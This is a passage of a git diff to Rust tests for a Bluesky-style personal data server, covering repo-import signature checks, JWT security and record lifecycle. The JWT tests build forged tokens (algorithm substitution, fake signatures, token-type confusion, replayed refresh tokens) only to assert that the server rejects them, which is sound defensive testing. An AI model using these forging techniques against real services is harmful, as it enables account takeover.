Ipld::String("app.bsky.feed.post".to_string())), 138 - ("text".to_string(), Ipld::String("Test post for verification".to_string())), 139 - ("createdAt".to_string(), Ipld::String("2024-01-01T00:00:00Z".to_string())), 139 + ( 140 + "$type".to_string(), 141 + Ipld::String("app.bsky.feed.post".to_string()), 142 + ), 143 + ( 144 + "text".to_string(), 145 + Ipld::String("Test post for verification".to_string()), 146 + ), 147 + ( 148 + "createdAt".to_string(), 149 + Ipld::String("2024-01-01T00:00:00Z".to_string()), 150 + ), 140 151 ])); 141 152 let bytes = serde_ipld_dagcbor::to_vec(&record).unwrap(); 142 153 let cid = make_cid(&bytes); 143 154 (bytes, cid) 144 155 } 145 - fn build_car_with_signature( 146 - did: &str, 147 - signing_key: &SigningKey, 148 - ) -> (Vec<u8>, Cid) { 156 + fn build_car_with_signature(did: &str, signing_key: &SigningKey) -> (Vec<u8>, Cid) { 149 157 let (record_bytes, record_cid) = create_record(); 150 - let (mst_bytes, mst_cid) = create_mst_node(vec![ 151 - ("app.bsky.feed.post/test123".to_string(), record_cid), 152 - ]); 158 + let (mst_bytes, mst_cid) = 159 + create_mst_node(vec![("app.bsky.feed.post/test123".to_string(), record_cid)]); 153 160 let (commit_bytes, commit_cid) = create_signed_commit(did, &mst_cid, signing_key); 154 161 let header = iroh_car::CarHeader::new_v1(vec![commit_cid]); 155 162 let header_bytes = header.encode().unwrap(); ··· 194 201 async fn test_import_with_valid_signature_and_mock_plc() { 195 202 let client = client(); 196 203 let (token, did) = create_account_and_login(&client).await; 197 - let key_bytes = get_user_signing_key(&did).await 204 + let key_bytes = get_user_signing_key(&did) 205 + .await 198 206 .expect("Failed to get user signing key"); 199 - let signing_key = SigningKey::from_slice(&key_bytes) 200 - .expect("Failed to create signing key"); 207 + let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key"); 201 208 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 202 209 let pds_endpoint = format!("https://{}", hostname); 203 210 let handle = did.split(':').last().unwrap_or("user"); ··· 209 216 } 210 217 let (car_bytes, _root_cid) = build_car_with_signature(&did, &signing_key); 211 218 let import_res = client 212 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 219 + .post(format!( 220 + "{}/xrpc/com.atproto.repo.importRepo", 221 + base_url().await 222 + )) 213 223 .bearer_auth(&token) 214 224 .header("Content-Type", "application/vnd.ipld.car") 215 225 .body(car_bytes) ··· 234 244 let client = client(); 235 245 let (token, did) = create_account_and_login(&client).await; 236 246 let wrong_signing_key = SigningKey::random(&mut rand::thread_rng()); 237 - let key_bytes = get_user_signing_key(&did).await 247 + let key_bytes = get_user_signing_key(&did) 248 + .await 238 249 .expect("Failed to get user signing key"); 239 - let correct_signing_key = SigningKey::from_slice(&key_bytes) 240 - .expect("Failed to create signing key"); 250 + let correct_signing_key = 251 + SigningKey::from_slice(&key_bytes).expect("Failed to create signing key"); 241 252 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 242 253 let pds_endpoint = format!("https://{}", hostname); 243 254 let handle = did.split(':').last().unwrap_or("user"); ··· 249 260 } 250 261 let (car_bytes, _root_cid) = build_car_with_signature(&did, &wrong_signing_key); 251 262 let import_res = client 252 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 263 + .post(format!( 264 + "{}/xrpc/com.atproto.repo.importRepo", 265 + base_url().await 266 + )) 253 267 .bearer_auth(&token) 254 268 .header("Content-Type", "application/vnd.ipld.car") 255 269 .body(car_bytes) ··· 268 282 body 269 283 ); 270 284 assert!( 271 - body["error"] == "InvalidSignature" || body["message"].as_str().unwrap_or("").contains("signature"), 285 + body["error"] == "InvalidSignature" 286 + || body["message"].as_str().unwrap_or("").contains("signature"), 272 287 "Error should mention signature: {:?}", 273 288 body 274 289 ); ··· 278 293 async fn test_import_with_did_mismatch_fails() { 279 294 let client = client(); 280 295 let (token, did) = create_account_and_login(&client).await; 281 - let key_bytes = get_user_signing_key(&did).await 296 + let key_bytes = get_user_signing_key(&did) 297 + .await 282 298 .expect("Failed to get user signing key"); 283 - let signing_key = SigningKey::from_slice(&key_bytes) 284 - .expect("Failed to create signing key"); 299 + let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key"); 285 300 let wrong_did = "did:plc:wrongdidthatdoesnotmatch"; 286 301 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 287 302 let pds_endpoint = format!("https://{}", hostname); ··· 294 309 } 295 310 let (car_bytes, _root_cid) = build_car_with_signature(wrong_did, &signing_key); 296 311 let import_res = client 297 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 312 + .post(format!( 313 + "{}/xrpc/com.atproto.repo.importRepo", 314 + base_url().await 315 + )) 298 316 .bearer_auth(&token) 299 317 .header("Content-Type", "application/vnd.ipld.car") 300 318 .body(car_bytes) ··· 318 336 async fn test_import_with_plc_resolution_failure() { 319 337 let client = client(); 320 338 let (token, did) = create_account_and_login(&client).await; 321 - let key_bytes = get_user_signing_key(&did).await 339 + let key_bytes = get_user_signing_key(&did) 340 + .await 322 341 .expect("Failed to get user signing key"); 323 - let signing_key = SigningKey::from_slice(&key_bytes) 324 - .expect("Failed to create signing key"); 342 + let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key"); 325 343 let mock_plc = MockServer::start().await; 326 344 let did_encoded = urlencoding::encode(&did); 327 345 let did_path = format!("/{}", did_encoded); ··· 336 354 } 337 355 let (car_bytes, _root_cid) = build_car_with_signature(&did, &signing_key); 338 356 let import_res = client 339 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 357 + .post(format!( 358 + "{}/xrpc/com.atproto.repo.importRepo", 359 + base_url().await 360 + )) 340 361 .bearer_auth(&token) 341 362 .header("Content-Type", "application/vnd.ipld.car") 342 363 .body(car_bytes) ··· 360 381 async fn test_import_with_no_signing_key_in_did_doc() { 361 382 let client = client(); 362 383 let (token, did) = create_account_and_login(&client).await; 363 - let key_bytes = get_user_signing_key(&did).await 384 + let key_bytes = get_user_signing_key(&did) 385 + .await 364 386 .expect("Failed to get user signing key"); 365 - let signing_key = SigningKey::from_slice(&key_bytes) 366 - .expect("Failed to create signing key"); 387 + let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key"); 367 388 let handle = did.split(':').last().unwrap_or("user"); 368 389 let did_doc_without_key = json!({ 369 390 "@context": ["https://www.w3.org/ns/did/v1"], ··· 379 400 } 380 401 let (car_bytes, _root_cid) = build_car_with_signature(&did, &signing_key); 381 402 let import_res = client 382 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 403 + .post(format!( 404 + "{}/xrpc/com.atproto.repo.importRepo", 405 + base_url().await 406 + )) 383 407 .bearer_auth(&token) 384 408 .header("Content-Type", "application/vnd.ipld.car") 385 409 .body(car_bytes)
+202 -76
tests/jwt_security.rs
··· 2 2 mod common; 3 3 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 4 4 use bspds::auth::{ 5 - self, create_access_token, create_refresh_token, create_service_token, 6 - verify_access_token, verify_refresh_token, verify_token, get_did_from_token, get_jti_from_token, 7 - TOKEN_TYPE_ACCESS, TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, 8 - SCOPE_ACCESS, SCOPE_REFRESH, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, 5 + self, SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH, 6 + TOKEN_TYPE_ACCESS, TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, create_access_token, 7 + create_refresh_token, create_service_token, get_did_from_token, get_jti_from_token, 8 + verify_access_token, verify_refresh_token, verify_token, 9 9 }; 10 10 use chrono::{Duration, Utc}; 11 11 use common::{base_url, client, create_account_and_login, get_db_connection_string}; 12 12 use k256::SecretKey; 13 - use k256::ecdsa::{SigningKey, Signature, signature::Signer}; 13 + use k256::ecdsa::{Signature, SigningKey, signature::Signer}; 14 14 use rand::rngs::OsRng; 15 15 use reqwest::StatusCode; 16 - use serde_json::{json, Value}; 16 + use serde_json::{Value, json}; 17 17 use sha2::{Digest, Sha256}; 18 18 19 19 fn generate_user_key() -> Vec<u8> { ··· 48 48 let result = verify_access_token(&forged_token, &key_bytes); 49 49 assert!(result.is_err(), "Forged signature must be rejected"); 50 50 let err_msg = result.err().unwrap().to_string(); 51 - assert!(err_msg.contains("signature") || err_msg.contains("Signature"), "Error should mention signature: {}", err_msg); 51 + assert!( 52 + err_msg.contains("signature") || err_msg.contains("Signature"), 53 + "Error should mention signature: {}", 54 + err_msg 55 + ); 52 56 } 53 57 54 58 #[test] ··· 116 120 let signature_b64 = URL_SAFE_NO_PAD.encode(&hmac_sig); 117 121 let malicious_token = format!("{}.{}", message, signature_b64); 118 122 let result = verify_access_token(&malicious_token, &key_bytes); 119 - assert!(result.is_err(), "HS256 algorithm substitution must be rejected"); 123 + assert!( 124 + result.is_err(), 125 + "HS256 algorithm substitution must be rejected" 126 + ); 120 127 } 121 128 122 129 #[test] ··· 141 148 let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 256]); 142 149 let malicious_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 143 150 let result = verify_access_token(&malicious_token, &key_bytes); 144 - assert!(result.is_err(), "RS256 algorithm substitution must be rejected"); 151 + assert!( 152 + result.is_err(), 153 + "RS256 algorithm substitution must be rejected" 154 + ); 145 155 } 146 156 147 157 #[test] ··· 166 176 let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]); 167 177 let malicious_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 168 178 let result = verify_access_token(&malicious_token, &key_bytes); 169 - assert!(result.is_err(), "ES256 (P-256) algorithm substitution must be rejected (we use ES256K/secp256k1)"); 179 + assert!( 180 + result.is_err(), 181 + "ES256 (P-256) algorithm substitution must be rejected (we use ES256K/secp256k1)" 182 + ); 170 183 } 171 184 172 185 #[test] ··· 175 188 let did = "did:plc:test"; 176 189 let refresh_token = create_refresh_token(did, &key_bytes).expect("create refresh token"); 177 190 let result = verify_access_token(&refresh_token, &key_bytes); 178 - assert!(result.is_err(), "Refresh token must not be accepted as access token"); 191 + assert!( 192 + result.is_err(), 193 + "Refresh token must not be accepted as access token" 194 + ); 179 195 let err_msg = result.err().unwrap().to_string(); 180 196 assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg); 181 197 } ··· 186 202 let did = "did:plc:test"; 187 203 let access_token = create_access_token(did, &key_bytes).expect("create access token"); 188 204 let result = verify_refresh_token(&access_token, &key_bytes); 189 - assert!(result.is_err(), "Access token must not be accepted as refresh token"); 205 + assert!( 206 + result.is_err(), 207 + "Access token must not be accepted as refresh token" 208 + ); 190 209 let err_msg = result.err().unwrap().to_string(); 191 210 assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg); 192 211 } ··· 195 214 fn test_jwt_security_token_type_confusion_service_as_access() { 196 215 let key_bytes = generate_user_key(); 197 216 let did = "did:plc:test"; 198 - let service_token = create_service_token(did, "did:web:target", "com.example.method", &key_bytes) 199 - .expect("create service token"); 217 + let service_token = 218 + create_service_token(did, "did:web:target", "com.example.method", &key_bytes) 219 + .expect("create service token"); 200 220 let result = verify_access_token(&service_token, &key_bytes); 201 - assert!(result.is_err(), "Service token must not be accepted as access token"); 221 + assert!( 222 + result.is_err(), 223 + "Service token must not be accepted as access token" 224 + ); 202 225 } 203 226 204 227 #[test] ··· 222 245 let result = verify_access_token(&malicious_token, &key_bytes); 223 246 assert!(result.is_err(), "Invalid scope must be rejected"); 224 247 let err_msg = result.err().unwrap().to_string(); 225 - assert!(err_msg.contains("Invalid token scope"), "Error: {}", err_msg); 248 + assert!( 249 + err_msg.contains("Invalid token scope"), 250 + "Error: {}", 251 + err_msg 252 + ); 226 253 } 227 254 228 255 #[test] ··· 244 271 }); 245 272 let token = create_custom_jwt(&header, &claims, &key_bytes); 246 273 let result = verify_access_token(&token, &key_bytes); 247 - assert!(result.is_err(), "Empty scope must be rejected for access tokens"); 274 + assert!( 275 + result.is_err(), 276 + "Empty scope must be rejected for access tokens" 277 + ); 248 278 } 249 279 250 280 #[test] ··· 265 295 }); 266 296 let token = create_custom_jwt(&header, &claims, &key_bytes); 267 297 let result = verify_access_token(&token, &key_bytes); 268 - assert!(result.is_err(), "Missing scope must be rejected for access tokens"); 298 + assert!( 299 + result.is_err(), 300 + "Missing scope must be rejected for access tokens" 301 + ); 269 302 } 270 303 271 304 #[test] ··· 311 344 }); 312 345 let token = create_custom_jwt(&header, &claims, &key_bytes); 313 346 let result = verify_access_token(&token, &key_bytes); 314 - assert!(result.is_ok(), "Slight future iat should be accepted for clock skew tolerance"); 347 + assert!( 348 + result.is_ok(), 349 + "Slight future iat should be accepted for clock skew tolerance" 350 + ); 315 351 } 316 352 317 353 #[test] ··· 321 357 let did = "did:plc:user1"; 322 358 let token = create_access_token(did, &key_bytes_user1).expect("create token"); 323 359 let result = verify_access_token(&token, &key_bytes_user2); 324 - assert!(result.is_err(), "Token signed by user1's key must not verify with user2's key"); 360 + assert!( 361 + result.is_err(), 362 + "Token signed by user1's key must not verify with user2's key" 363 + ); 325 364 } 326 365 327 366 #[test] ··· 369 408 ]; 370 409 for token in malformed_tokens { 371 410 let result = verify_access_token(token, &key_bytes); 372 - assert!(result.is_err(), "Malformed token '{}' must be rejected", 373 - if token.len() > 40 { &token[..40] } else { token }); 411 + assert!( 412 + result.is_err(), 413 + "Malformed token '{}' must be rejected", 414 + if token.len() > 40 { 415 + &token[..40] 416 + } else { 417 + token 418 + } 419 + ); 374 420 } 375 421 } 376 422 ··· 379 425 let key_bytes = generate_user_key(); 380 426 let did = "did:plc:test"; 381 427 let test_cases = vec![ 382 - (json!({ 383 - "iss": did, 384 - "sub": did, 385 - "aud": "did:web:test", 386 - "iat": Utc::now().timestamp(), 387 - "scope": SCOPE_ACCESS 388 - }), "exp"), 389 - (json!({ 390 - "iss": did, 391 - "sub": did, 392 - "aud": "did:web:test", 393 - "exp": Utc::now().timestamp() + 3600, 394 - "scope": SCOPE_ACCESS 395 - }), "iat"), 396 - (json!({ 397 - "iss": did, 398 - "aud": "did:web:test", 399 - "iat": Utc::now().timestamp(), 400 - "exp": Utc::now().timestamp() + 3600, 401 - "scope": SCOPE_ACCESS 402 - }), "sub"), 428 + ( 429 + json!({ 430 + "iss": did, 431 + "sub": did, 432 + "aud": "did:web:test", 433 + "iat": Utc::now().timestamp(), 434 + "scope": SCOPE_ACCESS 435 + }), 436 + "exp", 437 + ), 438 + ( 439 + json!({ 440 + "iss": did, 441 + "sub": did, 442 + "aud": "did:web:test", 443 + "exp": Utc::now().timestamp() + 3600, 444 + "scope": SCOPE_ACCESS 445 + }), 446 + "iat", 447 + ), 448 + ( 449 + json!({ 450 + "iss": did, 451 + "aud": "did:web:test", 452 + "iat": Utc::now().timestamp(), 453 + "exp": Utc::now().timestamp() + 3600, 454 + "scope": SCOPE_ACCESS 455 + }), 456 + "sub", 457 + ), 403 458 ]; 404 459 for (claims, missing_claim) in test_cases { 405 460 let header = json!({ ··· 408 463 }); 409 464 let token = create_custom_jwt(&header, &claims, &key_bytes); 410 465 let result = verify_access_token(&token, &key_bytes); 411 - assert!(result.is_err(), "Token missing '{}' claim must be rejected", missing_claim); 466 + assert!( 467 + result.is_err(), 468 + "Token missing '{}' claim must be rejected", 469 + missing_claim 470 + ); 412 471 } 413 472 } 414 473 ··· 455 514 }); 456 515 let token = create_custom_jwt(&header, &claims, &key_bytes); 457 516 let result = verify_access_token(&token, &key_bytes); 458 - assert!(result.is_ok(), "Extra header fields should not cause issues (we ignore them)"); 517 + assert!( 518 + result.is_ok(), 519 + "Extra header fields should not cause issues (we ignore them)" 520 + ); 459 521 } 460 522 461 523 #[test] ··· 499 561 let result = verify_access_token(&token, &key_bytes); 500 562 if result.is_ok() { 501 563 let data = result.unwrap(); 502 - assert!(!data.claims.sub.contains('\0'), "Null bytes in claims should be sanitized or rejected"); 564 + assert!( 565 + !data.claims.sub.contains('\0'), 566 + "Null bytes in claims should be sanitized or rejected" 567 + ); 503 568 } 504 569 } 505 570 ··· 517 582 let completely_invalid_token = format!("{}.{}.{}", parts[0], parts[1], completely_invalid_sig); 518 583 let _result1 = verify_access_token(&almost_valid_token, &key_bytes); 519 584 let _result2 = verify_access_token(&completely_invalid_token, &key_bytes); 520 - assert!(true, "Signature verification should use constant-time comparison (timing attack prevention)"); 585 + assert!( 586 + true, 587 + "Signature verification should use constant-time comparison (timing attack prevention)" 588 + ); 521 589 } 522 590 523 591 #[test] 524 592 fn test_jwt_security_valid_scopes_accepted() { 525 593 let key_bytes = generate_user_key(); 526 594 let did = "did:plc:test"; 527 - let valid_scopes = vec![ 528 - SCOPE_ACCESS, 529 - SCOPE_APP_PASS, 530 - SCOPE_APP_PASS_PRIVILEGED, 531 - ]; 595 + let valid_scopes = vec![SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]; 532 596 for scope in valid_scopes { 533 597 let header = json!({ 534 598 "alg": "ES256K", ··· 568 632 }); 569 633 let token = create_custom_jwt(&header, &claims, &key_bytes); 570 634 let result = verify_access_token(&token, &key_bytes); 571 - assert!(result.is_err(), "Refresh scope with access token type must be rejected"); 635 + assert!( 636 + result.is_err(), 637 + "Refresh scope with access token type must be rejected" 638 + ); 572 639 } 573 640 574 641 #[test] ··· 586 653 let fake_sig = URL_SAFE_NO_PAD.encode(&[0u8; 64]); 587 654 let unverified_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 588 655 let extracted_unsafe = get_did_from_token(&unverified_token).expect("extract unsafe"); 589 - assert_eq!(extracted_unsafe, "did:plc:sub", "get_did_from_token extracts sub without verification (by design for lookup)"); 656 + assert_eq!( 657 + extracted_unsafe, "did:plc:sub", 658 + "get_did_from_token extracts sub without verification (by design for lookup)" 659 + ); 590 660 } 591 661 592 662 #[test] ··· 602 672 let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"iss":"did:plc:test"}"#); 603 673 let fake_sig = URL_SAFE_NO_PAD.encode(&[0u8; 64]); 604 674 let no_jti_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 605 - assert!(get_jti_from_token(&no_jti_token).is_err(), "Missing jti should error"); 675 + assert!( 676 + get_jti_from_token(&no_jti_token).is_err(), 677 + "Missing jti should error" 678 + ); 606 679 } 607 680 608 681 #[test] 609 682 fn test_jwt_security_key_from_invalid_bytes_rejected() { 610 - let invalid_keys: Vec<&[u8]> = vec![ 611 - &[], 612 - &[0u8; 31], 613 - &[0u8; 33], 614 - &[0xFFu8; 32], 615 - ]; 683 + let invalid_keys: Vec<&[u8]> = vec![&[], &[0u8; 31], &[0u8; 33], &[0xFFu8; 32]]; 616 684 for key in invalid_keys { 617 685 let result = create_access_token("did:plc:test", key); 618 686 if result.is_ok() { ··· 644 712 "scope": SCOPE_ACCESS 645 713 }); 646 714 let token1 = create_custom_jwt(&header, &just_expired, &key_bytes); 647 - assert!(verify_access_token(&token1, &key_bytes).is_err(), "Just expired token must be rejected"); 715 + assert!( 716 + verify_access_token(&token1, &key_bytes).is_err(), 717 + "Just expired token must be rejected" 718 + ); 648 719 let expires_exactly_now = json!({ 649 720 "iss": did, 650 721 "sub": did, ··· 656 727 }); 657 728 let token2 = create_custom_jwt(&header, &expires_exactly_now, &key_bytes); 658 729 let result2 = verify_access_token(&token2, &key_bytes); 659 - assert!(result2.is_err() || result2.is_ok(), "Token expiring exactly now is a boundary case - either behavior is acceptable"); 730 + assert!( 731 + result2.is_err() || result2.is_ok(), 732 + "Token expiring exactly now is a boundary case - either behavior is acceptable" 733 + ); 660 734 } 661 735 662 736 #[test] ··· 714 788 .send() 715 789 .await 716 790 .unwrap(); 717 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged session token must be rejected"); 791 + assert_eq!( 792 + res.status(), 793 + StatusCode::UNAUTHORIZED, 794 + "Forged session token must be rejected" 795 + ); 718 796 } 719 797 720 798 #[tokio::test] ··· 734 812 .send() 735 813 .await 736 814 .unwrap(); 737 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Tampered/expired token must be rejected"); 815 + assert_eq!( 816 + res.status(), 817 + StatusCode::UNAUTHORIZED, 818 + "Tampered/expired token must be rejected" 819 + ); 738 820 } 739 821 740 822 #[tokio::test] ··· 755 837 .send() 756 838 .await 757 839 .unwrap(); 758 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "DID-tampered token must be rejected"); 840 + assert_eq!( 841 + res.status(), 842 + StatusCode::UNAUTHORIZED, 843 + "DID-tampered token must be rejected" 844 + ); 759 845 } 760 846 761 847 #[tokio::test] ··· 811 897 .send() 812 898 .await 813 899 .unwrap(); 814 - assert_eq!(first_refresh.status(), StatusCode::OK, "First refresh should succeed"); 900 + assert_eq!( 901 + first_refresh.status(), 902 + StatusCode::OK, 903 + "First refresh should succeed" 904 + ); 815 905 let replay_res = http_client 816 906 .post(format!("{}/xrpc/com.atproto.server.refreshSession", url)) 817 907 .header("Authorization", format!("Bearer {}", refresh_jwt)) 818 908 .send() 819 909 .await 820 910 .unwrap(); 821 - assert_eq!(replay_res.status(), StatusCode::UNAUTHORIZED, "Refresh token replay must be rejected"); 911 + assert_eq!( 912 + replay_res.status(), 913 + StatusCode::UNAUTHORIZED, 914 + "Refresh token replay must be rejected" 915 + ); 822 916 } 823 917 824 918 #[tokio::test] ··· 832 926 .send() 833 927 .await 834 928 .unwrap(); 835 - assert_eq!(valid_res.status(), StatusCode::OK, "Valid Bearer format should work"); 929 + assert_eq!( 930 + valid_res.status(), 931 + StatusCode::OK, 932 + "Valid Bearer format should work" 933 + ); 836 934 let lowercase_res = http_client 837 935 .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 838 936 .header("Authorization", format!("bearer {}", access_jwt)) 839 937 .send() 840 938 .await 841 939 .unwrap(); 842 - assert_eq!(lowercase_res.status(), StatusCode::OK, "Lowercase 'bearer' should be accepted (RFC 7235 case-insensitivity)"); 940 + assert_eq!( 941 + lowercase_res.status(), 942 + StatusCode::OK, 943 + "Lowercase 'bearer' should be accepted (RFC 7235 case-insensitivity)" 944 + ); 843 945 let basic_res = http_client 844 946 .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 845 947 .header("Authorization", format!("Basic {}", access_jwt)) 846 948 .send() 847 949 .await 848 950 .unwrap(); 849 - assert_eq!(basic_res.status(), StatusCode::UNAUTHORIZED, "Basic scheme must be rejected"); 951 + assert_eq!( 952 + basic_res.status(), 953 + StatusCode::UNAUTHORIZED, 954 + "Basic scheme must be rejected" 955 + ); 850 956 let no_scheme_res = http_client 851 957 .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 852 958 .header("Authorization", &access_jwt) 853 959 .send() 854 960 .await 855 961 .unwrap(); 856 - assert_eq!(no_scheme_res.status(), StatusCode::UNAUTHORIZED, "Missing scheme must be rejected"); 962 + assert_eq!( 963 + no_scheme_res.status(), 964 + StatusCode::UNAUTHORIZED, 965 + "Missing scheme must be rejected" 966 + ); 857 967 let empty_token_res = http_client 858 968 .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 859 969 .header("Authorization", "Bearer ") 860 970 .send() 861 971 .await 862 972 .unwrap(); 863 - assert_eq!(empty_token_res.status(), StatusCode::UNAUTHORIZED, "Empty token must be rejected"); 973 + assert_eq!( 974 + empty_token_res.status(), 975 + StatusCode::UNAUTHORIZED, 976 + "Empty token must be rejected" 977 + ); 864 978 } 865 979 866 980 #[tokio::test] ··· 874 988 .send() 875 989 .await 876 990 .unwrap(); 877 - assert_eq!(get_res.status(), StatusCode::OK, "Token should work before logout"); 991 + assert_eq!( 992 + get_res.status(), 993 + StatusCode::OK, 994 + "Token should work before logout" 995 + ); 878 996 let logout_res = http_client 879 997 .post(format!("{}/xrpc/com.atproto.server.deleteSession", url)) 880 998 .header("Authorization", format!("Bearer {}", access_jwt)) ··· 888 1006 .send() 889 1007 .await 890 1008 .unwrap(); 891 - assert_eq!(after_logout_res.status(), StatusCode::UNAUTHORIZED, "Token must be rejected after logout"); 1009 + assert_eq!( 1010 + after_logout_res.status(), 1011 + StatusCode::UNAUTHORIZED, 1012 + "Token must be rejected after logout" 1013 + ); 892 1014 } 893 1015 894 1016 #[tokio::test] ··· 910 1032 .send() 911 1033 .await 912 1034 .unwrap(); 913 - assert_eq!(get_res.status(), StatusCode::UNAUTHORIZED, "Deactivated account token must be rejected"); 1035 + assert_eq!( 1036 + get_res.status(), 1037 + StatusCode::UNAUTHORIZED, 1038 + "Deactivated account token must be rejected" 1039 + ); 914 1040 let body: Value = get_res.json().await.unwrap(); 915 1041 assert_eq!(body["error"], "AccountDeactivated"); 916 1042 }
+129 -37
tests/lifecycle_record.rs
··· 1 1 mod common; 2 2 mod helpers; 3 + use chrono::Utc; 3 4 use common::*; 4 5 use helpers::*; 5 - use chrono::Utc; 6 6 use reqwest::{StatusCode, header}; 7 7 use serde_json::{Value, json}; 8 8 use std::time::Duration; ··· 307 307 .send() 308 308 .await 309 309 .expect("Failed to create profile"); 310 - assert_eq!(create_res.status(), StatusCode::OK, "Failed to create profile"); 310 + assert_eq!( 311 + create_res.status(), 312 + StatusCode::OK, 313 + "Failed to create profile" 314 + ); 311 315 let create_body: Value = create_res.json().await.unwrap(); 312 316 let initial_cid = create_body["cid"].as_str().unwrap().to_string(); 313 317 let get_res = client ··· 326 330 assert_eq!(get_res.status(), StatusCode::OK); 327 331 let get_body: Value = get_res.json().await.unwrap(); 328 332 assert_eq!(get_body["value"]["displayName"], "Test User"); 329 - assert_eq!(get_body["value"]["description"], "A test profile for lifecycle testing"); 333 + assert_eq!( 334 + get_body["value"]["description"], 335 + "A test profile for lifecycle testing" 336 + ); 330 337 let update_payload = json!({ 331 338 "repo": did, 332 339 "collection": "app.bsky.actor.profile", ··· 348 355 .send() 349 356 .await 350 357 .expect("Failed to update profile"); 351 - assert_eq!(update_res.status(), StatusCode::OK, "Failed to update profile"); 358 + assert_eq!( 359 + update_res.status(), 360 + StatusCode::OK, 361 + "Failed to update profile" 362 + ); 352 363 let get_updated_res = client 353 364 .get(format!( 354 365 "{}/xrpc/com.atproto.repo.getRecord", ··· 371 382 let client = client(); 372 383 let (alice_did, alice_jwt) = setup_new_user("alice-thread").await; 373 384 let (bob_did, bob_jwt) = setup_new_user("bob-thread").await; 374 - let (root_uri, root_cid) = create_post(&client, &alice_did, &alice_jwt, "This is the root post").await; 385 + let (root_uri, root_cid) = 386 + create_post(&client, &alice_did, &alice_jwt, "This is the root post").await; 375 387 tokio::time::sleep(Duration::from_millis(100)).await; 376 388 let reply_collection = "app.bsky.feed.post"; 377 389 let reply_rkey = format!("e2e_reply_{}", Utc::now().timestamp_millis()); ··· 459 471 .send() 460 472 .await 461 473 .expect("Failed to create nested reply"); 462 - assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply"); 474 + assert_eq!( 475 + nested_res.status(), 476 + StatusCode::OK, 477 + "Failed to create nested reply" 478 + ); 463 479 } 464 480 465 481 #[tokio::test] ··· 501 517 .send() 502 518 .await 503 519 .expect("Failed to create profile with blob"); 504 - assert_eq!(create_res.status(), StatusCode::OK, "Failed to create profile with blob"); 520 + assert_eq!( 521 + create_res.status(), 522 + StatusCode::OK, 523 + "Failed to create profile with blob" 524 + ); 505 525 let get_res = client 506 526 .get(format!( 507 527 "{}/xrpc/com.atproto.repo.getRecord", ··· 592 612 .send() 593 613 .await 594 614 .expect("Failed to verify record exists"); 595 - assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist"); 615 + assert_eq!( 616 + get_res.status(), 617 + StatusCode::OK, 618 + "Record should still exist" 619 + ); 596 620 } 597 621 598 622 #[tokio::test] ··· 735 759 .await 736 760 .expect("Failed to get updated profile"); 737 761 let updated_profile: Value = get_updated_profile.json().await.unwrap(); 738 - assert_eq!(updated_profile["value"]["displayName"], "Updated Batch User"); 762 + assert_eq!( 763 + updated_profile["value"]["displayName"], 764 + "Updated Batch User" 765 + ); 739 766 let get_deleted_post = client 740 767 .get(format!( 741 768 "{}/xrpc/com.atproto.repo.getRecord", ··· 805 832 "{}/xrpc/com.atproto.repo.listRecords", 806 833 base_url().await 807 834 )) 808 - .query(&[ 809 - ("repo", did.as_str()), 810 - ("collection", "app.bsky.feed.post"), 811 - ]) 835 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")]) 812 836 .send() 813 837 .await 814 838 .expect("Failed to list records"); ··· 820 844 .iter() 821 845 .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 822 846 .collect(); 823 - assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)"); 847 + assert_eq!( 848 + rkeys, 849 + vec!["cccc", "bbbb", "aaaa"], 850 + "Default order should be DESC (newest first)" 851 + ); 824 852 } 825 853 826 854 #[tokio::test] ··· 852 880 .iter() 853 881 .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 854 882 .collect(); 855 - assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)"); 883 + assert_eq!( 884 + rkeys, 885 + vec!["aaaa", "bbbb", "cccc"], 886 + "reverse=true should give ASC order (oldest first)" 887 + ); 856 888 } 857 889 858 890 #[tokio::test] ··· 860 892 let client = client(); 861 893 let (did, jwt) = setup_new_user("list-cursor").await; 862 894 for i in 0..5 { 863 - create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await; 895 + create_post_with_rkey( 896 + 